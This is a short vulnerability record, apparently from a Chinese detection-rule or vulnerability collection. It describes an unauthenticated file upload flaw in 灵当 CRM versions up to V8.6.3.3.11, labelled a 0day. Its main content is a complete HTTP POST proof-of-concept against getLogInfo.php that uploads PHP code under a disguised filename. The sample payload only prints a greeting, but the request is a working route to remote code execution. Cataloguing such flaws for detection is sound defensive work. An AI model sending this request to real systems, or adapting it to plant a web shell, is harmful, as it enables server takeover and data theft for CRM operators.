vendor = "灵当"
name = "灵当 CRM getLogInfo.php文件上传漏洞"
type = "权限绕过"
version = "<=V8.6.3.3.11"
path = "/crm/WeiXinApp/CallRecordLog/getLogInfo.php"
detail = "POST /crm/WeiXinApp/CallRecordLog/getLogInfo.php?userid=&gettype=uploadfile&uploadfilename=221.php......&callednumber=&sessionvalue=ca6ee37ed4ea2c709b2d36d1349cacff HTTP/1.1 Host: your-ip Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name=\"uploaded_file\"; filename=\"123321.avi\" Content-Type: image/jpeg <?php print \"Hello, World!\"; ?> ------WebKitFormBoundary7MA4YWxkTrZu0gW--"
fix = "缺省规则可检出，除非设备规则太烂"
date = "0702"
label = "0day"
verifier = "sxf"
